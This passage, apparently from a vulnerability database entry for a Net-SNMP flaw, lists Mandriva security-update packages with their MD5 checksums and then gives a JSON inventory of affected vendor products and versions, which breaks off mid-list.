    Mandriva Linux 2007.1/X86_64: aa27de502ce22110fd745c0b847b79d9 2007.1/x86_64/lib64net-snmp10-5.3.1-3.2mdv2007.1.x86_64.rpm 1843dd154c443cca9ae977e502221d6d 2007.1/x86_64/lib64net-snmp10-devel-5.3.1-3.2mdv2007.1.x86_64.rpm 838bd7820d446bd947bc46e090b38066 2007.1/x86_64/lib64net-snmp10-static-devel-5.3.1-3.2mdv2007.1.x86_64.rpm e659d3df04816330c7bf45008f66bc27 2007.1/x86_64/net-snmp-5.3.1-3.2mdv2007.1.x86_64.rpm 756d5606a1039d20a7512b0a109d53bb 2007.1/x86_64/net-snmp-mibs-5.3.1-3.2mdv2007.1.x86_64.rpm 8ad36943e07362865f3a48c99914e48c 2007.1/x86_64/net-snmp-trapd-5.3.1-3.2mdv2007.1.x86_64.rpm 483140c06017507127d12357c3ed2b41 2007.1/x86_64/net-snmp-utils-5.3.1-3.2mdv2007.1.x86_64.rpm e2bb901815ffa1ca5b0a16bc1363f84f 2007.1/x86_64/perl-NetSNMP-5.3.1-3.2mdv2007.1.x86_64.rpm 7a0806202ff8f3d838fa7958b636a449 2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm

    Mandriva Linux 2008.0: 8de3c4975620db2b2c2697d6f9deb79b 2008.0/i586/libnet-snmp15-5.4.1-1.1mdv2008.0.i586.rpm b1991c58d996f4be200fe141e28c5f7d 2008.0/i586/libnet-snmp-devel-5.4.1-1.1mdv2008.0.i586.rpm 03c54182cc7f97633f29ff0251a8c898 2008.0/i586/libnet-snmp-static-devel-5.4.1-1.1mdv2008.0.i586.rpm 1f792de19b7b38b56d68242958d5d800 2008.0/i586/net-snmp-5.4.1-1.1mdv2008.0.i586.rpm e3362a641e232a6ecf0b8230f0e49ec8 2008.0/i586/net-snmp-mibs-5.4.1-1.1mdv2008.0.i586.rpm bc6d8c10135ea64a4d512d80d04b1b39 2008.0/i586/net-snmp-trapd-5.4.1-1.1mdv2008.0.i586.rpm 8e7f28ee85fb48129eea57d11d391c8b 2008.0/i586/net-snmp-utils-5.4.1-1.1mdv2008.0.i586.rpm beab129e378f61a6bf62d366a4d90639 2008.0/i586/perl-NetSNMP-5.4.1-1.1mdv2008.0.i586.rpm 3fce488df784163f19e6a55061d773ca 2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: 82b570c9cb7e0662df4d7da730c131db 2008.0/x86_64/lib64net-snmp15-5.4.1-1.1mdv2008.0.x86_64.rpm 20b8a6e3fc8dd82fe5ecfdb337553938 2008.0/x86_64/lib64net-snmp-devel-5.4.1-1.1mdv2008.0.x86_64.rpm 555688caa0eee850b3a5f835a5778849 2008.0/x86_64/lib64net-snmp-static-devel-5.4.1-1.1mdv2008.0.x86_64.rpm 60d65f80aec29dcb6d4ceb4bb117a9bc 2008.0/x86_64/net-snmp-5.4.1-1.1mdv2008.0.x86_64.rpm 685c9dd25b585afc128de1b3c092e5d5 2008.0/x86_64/net-snmp-mibs-5.4.1-1.1mdv2008.0.x86_64.rpm 7bff860904572c092f737ac17940d5b2 2008.0/x86_64/net-snmp-trapd-5.4.1-1.1mdv2008.0.x86_64.rpm e434686bddfb04f2a8bd01346517ecb4 2008.0/x86_64/net-snmp-utils-5.4.1-1.1mdv2008.0.x86_64.rpm 4fab6e498e1f05809db500ce895aad66 2008.0/x86_64/perl-NetSNMP-5.4.1-1.1mdv2008.0.x86_64.rpm 3fce488df784163f19e6a55061d773ca 2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm

    Mandriva Linux 2008.1: 4bafceae1a29f6557b5aa884eca24ba0 2008.1/i586/libnet-snmp15-5.4.1-5.1mdv2008.1.i586.rpm 1eedbae5df7e503de1cba736129beaa1 2008.1/i586/libnet-snmp-devel-5.4.1-5.1mdv2008.1.i586.rpm 615a88847cbf1ce6eaf0029037a14b1b 2008.1/i586/libnet-snmp-static-devel-5.4.1-5.1mdv2008.1.i586.rpm 7323cb7d35eb67664d40ad73b413679d 2008.1/i586/net-snmp-5.4.1-5.1mdv2008.1.i586.rpm d43ed96a806639a94af2a137c75e276e 2008.1/i586/net-snmp-mibs-5.4.1-5.1mdv2008.1.i586.rpm 7394b1361b43056b5eb99827771358cf 2008.1/i586/net-snmp-tkmib-5.4.1-5.1mdv2008.1.i586.rpm 8d6fd9308c2edbe8c020d2c33b3a841d 2008.1/i586/net-snmp-trapd-5.4.1-5.1mdv2008.1.i586.rpm dc58047a02e1a222af20aa794ea8f447 2008.1/i586/net-snmp-utils-5.4.1-5.1mdv2008.1.i586.rpm 2ad9888cd61fc4952c1cee0c48f714b5 2008.1/i586/perl-NetSNMP-5.4.1-5.1mdv2008.1.i586.rpm 7a19c1f8d42052af6392b18b48bd965c 2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm

    Mandriva Linux 2008.1/X86_64: 618c241e0ecb57685646264c9bb083b4 2008.1/x86_64/lib64net-snmp15-5.4.1-5.1mdv2008.1.x86_64.rpm bb0ebf49ee7cca29965aeb398f4725f6 2008.1/x86_64/lib64net-snmp-devel-5.4.1-5.1mdv2008.1.x86_64.rpm b4f29f00773291f6cc00784ed7cde470 2008.1/x86_64/lib64net-snmp-static-devel-5.4.1-5.1mdv2008.1.x86_64.rpm 3039811b6682dc4009b32ff48a99eb2b 2008.1/x86_64/net-snmp-5.4.1-5.1mdv2008.1.x86_64.rpm fab09178635501eb5d6a82eb7bd532a3 2008.1/x86_64/net-snmp-mibs-5.4.1-5.1mdv2008.1.x86_64.rpm da29d4c7edaa15d95f8bee98dbfab025 2008.1/x86_64/net-snmp-tkmib-5.4.1-5.1mdv2008.1.x86_64.rpm d9aad834d82d310c64f6f21e17a55920 2008.1/x86_64/net-snmp-trapd-5.4.1-5.1mdv2008.1.x86_64.rpm 7a7c871bd87dc91c16b046ac115cda70 2008.1/x86_64/net-snmp-utils-5.4.1-5.1mdv2008.1.x86_64.rpm d102ea2af0fcaaebd98defda72bcfc91 2008.1/x86_64/perl-NetSNMP-5.4.1-5.1mdv2008.1.x86_64.rpm 7a19c1f8d42052af6392b18b48bd965c 2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm

    Corporate 3.0: 335af3930865c8eb44ef436cad5fb373 corporate/3.0/i586/libnet-snmp5-5.1-7.4.C30mdk.i586.rpm b8e1d307ee6fa3905d292077fc063318 corporate/3.0/i586/libnet-snmp5-devel-5.1-7.4.C30mdk.i586.rpm a668cc4de411865567d1a93f34cee1e3 corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.4.C30mdk.i586.rpm d8c0d342b03e5719443d2de06c631bd5 corporate/3.0/i586/libsnmp0-4.2.3-8.2.C30mdk.i586.rpm 6bbe3bb2502ce3c974f7b5737331bb4d corporate/3.0/i586/libsnmp0-devel-4.2.3-8.2.C30mdk.i586.rpm daca10f2e578f75c1e7415d78ed30265 corporate/3.0/i586/net-snmp-5.1-7.4.C30mdk.i586.rpm 1630ebd75201e1bc3956b12a26282f92 corporate/3.0/i586/net-snmp-mibs-5.1-7.4.C30mdk.i586.rpm 5a4f483c877a6278088a265cb3273d61 corporate/3.0/i586/net-snmp-trapd-5.1-7.4.C30mdk.i586.rpm 316d866de7fa7cd984d58f5cb742f5e3 corporate/3.0/i586/net-snmp-utils-5.1-7.4.C30mdk.i586.rpm e3d4197517565f12e2c3a8fd1cc5d2e7 corporate/3.0/i586/ucd-snmp-4.2.3-8.2.C30mdk.i586.rpm 17e8d856fd1dac18552818a842105c88 corporate/3.0/i586/ucd-snmp-utils-4.2.3-8.2.C30mdk.i586.rpm ccaa4d311ad0e5d119e17b1f1876c7e2 corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm 53e16d2069cffb7e7d1e7a324192d5c2 corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm

    Corporate 3.0/X86_64: b31f277942fca76d953007c94a60cae2 corporate/3.0/x86_64/lib64net-snmp5-5.1-7.4.C30mdk.x86_64.rpm e4a3fba10ccdd805dc8783ae68c99a42 corporate/3.0/x86_64/lib64net-snmp5-devel-5.1-7.4.C30mdk.x86_64.rpm 530a94cc87af0e4d6e9f3815473c0dd4 corporate/3.0/x86_64/lib64net-snmp5-static-devel-5.1-7.4.C30mdk.x86_64.rpm f246ca421b5d16c599d53f70e4b97660 corporate/3.0/x86_64/lib64snmp0-4.2.3-8.2.C30mdk.x86_64.rpm b943e07726a2fecb016ef4ba626906d8 corporate/3.0/x86_64/lib64snmp0-devel-4.2.3-8.2.C30mdk.x86_64.rpm 22822876f72e35cf6d1ed027df93e74a corporate/3.0/x86_64/net-snmp-5.1-7.4.C30mdk.x86_64.rpm e7e51782b9bbd1e1bdf93c17fb953280 corporate/3.0/x86_64/net-snmp-mibs-5.1-7.4.C30mdk.x86_64.rpm e67a9105f9492c020693d48ce55652ea corporate/3.0/x86_64/net-snmp-trapd-5.1-7.4.C30mdk.x86_64.rpm 171a17e507b2dfdb9c70c0089e582221 corporate/3.0/x86_64/net-snmp-utils-5.1-7.4.C30mdk.x86_64.rpm 96886146d21175b076e92d59e96f5016 corporate/3.0/x86_64/ucd-snmp-4.2.3-8.2.C30mdk.x86_64.rpm 1b6ee4c253f15be516a1928a4f791f15 corporate/3.0/x86_64/ucd-snmp-utils-4.2.3-8.2.C30mdk.x86_64.rpm ccaa4d311ad0e5d119e17b1f1876c7e2 corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm 53e16d2069cffb7e7d1e7a324192d5c2 corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm

    Corporate 4.0: 6cbe9d76db3b05c2435bcbc5cf16c898 corporate/4.0/i586/libnet-snmp5-5.2.1.2-5.2.20060mlcs4.i586.rpm 586a55cfde45020d5ea0ebf5f2d6c840 corporate/4.0/i586/libnet-snmp5-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm d992d8300cf0639942a179349d592e15 corporate/4.0/i586/libnet-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm 03a49b848c376b705dcfcef0ec817daf corporate/4.0/i586/net-snmp-5.2.1.2-5.2.20060mlcs4.i586.rpm 22b9d01b3b7a8a34ed3e1a5a435286a8 corporate/4.0/i586/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.i586.rpm dccc01a94c1f29eac2875e6a935bf589 corporate/4.0/i586/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.i586.rpm 77f93230f96abce039b52ca5612eaa36 corporate/4.0/i586/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.i586.rpm 8a7209b70979c9d73035ff40cbd8dbb4 corporate/4.0/i586/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.i586.rpm ac919459a8752cddfd441c085ca69117 corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: f94c7e967973ba8aa12b5605251d6e78 corporate/4.0/x86_64/lib64net-snmp5-5.2.1.2-5.2.20060mlcs4.x86_64.rpm f332985986eff2d6c8a75b5c263dedb1 corporate/4.0/x86_64/lib64net-snmp5-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm 82fc454916e75866370ee738292021c8 corporate/4.0/x86_64/lib64net-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm ff0adeb23df57eb34869c7100df159da corporate/4.0/x86_64/net-snmp-5.2.1.2-5.2.20060mlcs4.x86_64.rpm 72f2dc9cb1695999660a9ff9c97e4c47 corporate/4.0/x86_64/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.x86_64.rpm 0f244551c87e051a8274e5050cf0bc2a corporate/4.0/x86_64/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.x86_64.rpm 7c4e7fb304c77c6551a50495d338e84e corporate/4.0/x86_64/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.x86_64.rpm 68d81ca4c173710ef43b36092df2a6ee corporate/4.0/x86_64/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.x86_64.rpm ac919459a8752cddfd441c085ca69117 corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: f98286a301d580fe306917cf0169ef88 mnf/2.0/i586/libnet-snmp5-5.1-7.4.M20mdk.i586.rpm 3ba27516773b1dd933828207cecc7754 mnf/2.0/SRPMS/net-snmp-5.1-7.4.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "src pe",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "src pe",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "session and resource control",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "session and resource control",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "extreme",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "global associates",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "network appliance",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "snmp research",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ecoscentric",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "netsnmp",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.58"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.56"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.54"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.52"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.5"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.45"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.43"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.419"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.417"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.416"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.415"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.413"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.410"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.41"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.55"
          },
          {
            "_id": null,
            "model": "ucd-snmp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ucd snmp",
            "version": "4.2.6"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux lts lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux enterprise sdk 10.sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "suse",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise sdk sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 01",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "fedora",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop version",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6600"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6400"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5700"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5600"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5400"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5300"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5100"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "net-snmp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "5.4.1"
          },
          {
            "_id": null,
            "model": "net-snmp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "5.3.2"
          },
          {
            "_id": null,
            "model": "net-snmp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "5.2.4"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "session and resource control appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "session and resource control appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "session and resource control appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
